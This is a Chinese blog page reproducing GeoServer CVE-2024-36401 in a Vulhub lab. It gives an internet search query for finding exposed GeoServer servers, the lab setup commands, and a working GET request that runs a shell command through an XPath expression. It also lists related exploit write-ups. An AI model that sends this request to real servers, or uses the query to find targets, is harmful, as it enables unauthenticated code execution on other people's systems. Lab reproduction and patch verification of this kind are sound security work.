GeoServer CVE-2024-36401 漏洞利用

最新推荐文章于 2025-03-14 16:13:22 发布

泷羽Sec-静安

最新推荐文章于 2025-03-14 16:13:22 发布

阅读量3.1k

点赞数 57

分类专栏： CVE漏洞复现文章标签：网络安全 web安全

本文链接：https://blog.youkuaiyun.com/Bugatti100Peagle/article/details/141216889

版权

GeoServer CVE-2024-36401 漏洞利用

搜索语法

app.name=“GeoServer” and ip.country=“CN” and icp.is_exception=“true”

版本属性

在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。

靶场环境

建议开一个美国区的云服务器，拉取GitHub和Vulhub方便。

git clone https://github.com/vulhub/vulhub.git
cd vulhub/
cd geoserver/CVE-2024-36401/
docker-compose up -d

访问 http://your-ip:8080/geoserver 查看到GeoServer的默认页面。

1723450106639

POC

GET方法的POC

1723450435176

GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0

1723450389978

进入容器查看，可以看到成功创建文件。

docker exec -it cve-2024-36401_web_1 /bin/bash
ls /tmp

基于POST方法的POC

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

泷羽Sec-静安

关注关注

57
点赞
踩
25

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

GeoServer SQL注入漏洞复现（CVE-2023-25157）

0xSec

06-09

8248

GeoServer在预览图层的时候，可以对图层进行数据过滤从而渲染出指定位置的图层。由于未对用户输入进行过滤，在使用需要以数据库作为数据存储的功能时，攻击者可以构造畸形的过滤语法，绕过GeoServer的词法解析从而造成SQL注入，获取服务器中的敏感信息，甚至可能获取数据库服务器权限。

【漏洞复现】CVE-2024-36401 Geoserver远程代码执行漏洞复现

总有人间一两风，填我十万八千梦

10-24

2962

GeoServer存在远程代码执行漏洞（CVE-2024-36401），未经身份认证的远程攻击者可以通过该漏洞在服务器上执行任意代码，从而获取服务器权限。

参与评论您还未登录，请先登录后发表或查看评论

未公开 GeoServer开源服务器wfs远程命令执行漏洞已复现(CVE-2024-36401)

小司机的奥拓

07-03

1304

资源分享包含但不限于网上未公开的day漏洞（更新漏洞POC共500+），2024最新企业SRC/CNVD/Edu实战挖掘技巧报告，红队内网横向渗透，代码审计，JS逆向，SRC培训等课程。

1day 【漏洞复现 | 成功上传Webshell】Geoserver 任意文件上传（CVE-2023-51444），从零基础到精通，收藏这篇就够了！_ureport-cve-2023-24187任意

最新发布

bdfcfff77fa的博客

03-14

1078

GeoServer 是一个用 Java 编写的开源软件服务器，允许用户共享和编辑地理空间数据。

GeoServer远程代码执行漏洞复现(CVE-2024-36401)

qq_26229345的博客

07-08

8638

文章仅供参考，本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责！

CVE-2024-23692：Rejetto HFS 2.x 远程代码执行漏洞[附POC]

薛定谔嘚喵博客

06-14

2345

Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件，它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月，互联网上披露其 2.x系列存在CVE-2024-23692 远程代码执行漏洞，该漏洞源于存在模板注入漏洞，允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。

【漏洞复现】Geoserver远程代码执行漏洞（CVE-2024-36401）

今天是几号的博客

07-03

4137

GeoServer已经发布先前版本的补丁，可以从下载页面（https://geoserver.org/）下载：2.25.1、2.24.3、2.24.2、2.23.2、2.21.5、2.20.7、2.20.4、2.19.2、2.18.0，从下载的补丁中获取gt-app-schema和gt-complex和 gt-xsd-core jar文件，替换掉WEB-INF/lib里面对应的文件即可。它为提供交互操作性而设计，使用开放标准发布来自任何主要空间数据源的数据。

Goby漏洞利用优化 | GeoServer远程代码执行漏洞（CVE-2024-36401）（支持回显命令执行、内存马）

m0_46699477的博客

07-09

1022

GeoSverver 远程代码执行漏洞 CVE-2024-36401：GeoSverver Tools 库的 API 在处理要素类型的属性名称时，会将这些属性名称不安全地传递给 commons-jxpath 库进行解析，由于 commons-jxpath 库在解析 XPath 表达式时可以执行任意代码，从而导致未经身份验证的用户能够利用特定的 OGC 请求参数远程执行代码。

0Day漏洞防御篇：GeoServer CVE-2024-36401远程代码执行漏洞

weixin_55163056的博客

07-08

1054

高危漏洞预警

GeoServer 属性名表达式前台代码执行漏洞（CVE-2024-36401）

4SecNet团队专栏

09-29

418

GeoServer是一个开源服务器，用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准，使用户能够通过网络访问和操作地理信息系统（GIS）数据，遵循OGC开放标准的开源WFS-T和WMS服务器。在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。nuclei格式检测规则。python脚本扫描。

GeoServer之xpath表达式远程代码执行CVE-2024-36401漏洞复现及分析

bring_coco的博客

11-15

954

比如GetPropertyValue（获取属性值），GetFeatureWithLock（获取带锁特征），CreateStoredQuery（创建存储查询），DropStoredQuery（删除存储查询），ListStoredQueries（列出已存储的查询），DescribeStoredQuery（描述存储查询）尽管版本之间存在一些重要差异，但请求语法通常保持不变。检查缓存中是否存在xpath已编译的表达式，如果 expr 不为 null，表示缓存中已存在已编译的表达式，直接返回该表达式，否则会编译。

GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

huangyongkang666的博客

07-10

1277

GeoServer安装的特别构造的输入利用代码注入漏洞，该漏洞是由于应用不安全地将属性名称作为XPath表达式进行评估，攻击者可以在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。

GeoServer漏洞（CVE-2023-25157）

m0_73605862的博客

12-04

1585

3.然后进行模糊搜索写入，利用了布尔注入进行注入，返回结果。通过绕过前面的strStartsWith语句然后在后面查询了版本，并且变成了数字。1.了解了一下这个geoserver的请求规范，顺便了解一下这个网页的请求规范以及返回结果是什么。4.修改注入语句，不知道返回成功了没有（好奇第一条数据有这么长吗），用了另外一种也返回的这个。然乎知道漏洞是用户在输入的时候可能不规范造成的sql注入，并且这个还支持模糊查询。前半部分是sql注入一些语句的测试，后面是漏洞的复现和利用。1.查看user 表。

Geoserver XPath表达式注入致远程代码执行漏洞复现(CVE-2024-36401)

0xSec

07-03

2351

2024年7月，互联网上披露Geoserver表达式注入致远程代码执行漏洞（CVE-2024-36401），攻击者无需认证即可利用该漏洞获取服务器权限，建议受影响的客户尽快修复漏洞。

GeoServer 存在 sql 注入漏洞

murphysec的博客

03-01

2992

GeoServer 是一个允许用户共享和编辑地理空间数据的开源软件服务器，支持 OGC Filter expression 和 OGC Common Query Language 语言，使用 PostGIS Datastore 作为数据库。PostGIS是PostgreSQL数据库的扩展程序，增加了数据库对地理对象的支持。

GeoServer SQL 注入漏洞复现（CVE-2024-25157）附poc_geoserverl漏洞

qd520_1314的博客

04-15

1822

在2.22.1和2.21.4之前版本中，在开放地理空间联盟（OGC）标准定义的过滤器和函数表达式中发现了一个SQL注入问题，未经身份验证的攻击者可以利用该漏洞进行SQL注入，执行恶意代码。使用方法：python CVE-2023-25157.py http://your-ip:8080/geoserver/ows。在进行注入之前，首先要获取地理图层列表信息，这是sql注入payload中的一个必要参数。1.访问http://yourip:8080/geoserver进入首页。2.获取每个功能名称。

GeoServer /geoserver/wms接口存在远程命令执行漏洞

nnn2188185的博客

05-22

1020

GeoServer /geoserver/wms接口存在远程命令执行漏洞

GeoServer OGC Filter SQL注入漏洞（CVE-2023-25157）vulhub漏洞复现

qq_53003652的博客

07-06

2148

GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。GeoServer是一款JAVA编写的、开源的、用于共享地理空间数据的软件服务器。GeoServer实现了开放地理空间信息联盟(OGC )标准下WFS、WMS、WCS、WMTS等格式的发布。在利用漏洞前，需要目标服务器中存在类型是PostGIS的数据空间（datastore）和工作空间（workspace）。成功注入获取版本信息。

GeoServer SQL 注入漏洞复现（CVE-2023-25157）附poc

网络安全爱好者，分享渗透测试、漏洞复现、src挖掘，靶场搭建知识和技巧

12-23

6839

GeoServer是OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作，通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。在2.22.1和2.21.4之前版本中，在开放地理空间联盟（OGC）标准定义的过滤器和函数表达式中发现了一个SQL注入问题，未经身份验证的攻击者可以利用该漏洞进行SQL注入，执行恶意代码。

cve-2024 poc

12-29

关于CVE-2024系列漏洞...此外还有其他几个值得关注的安全公告也涉及到2024年的CVE编号，比如GeoServer中存在的CVE-2024-36401以及Jenkins平台上的CVE-2024-43044等问题均发布了相应的检测手段和技术细节说明[^3][^4]。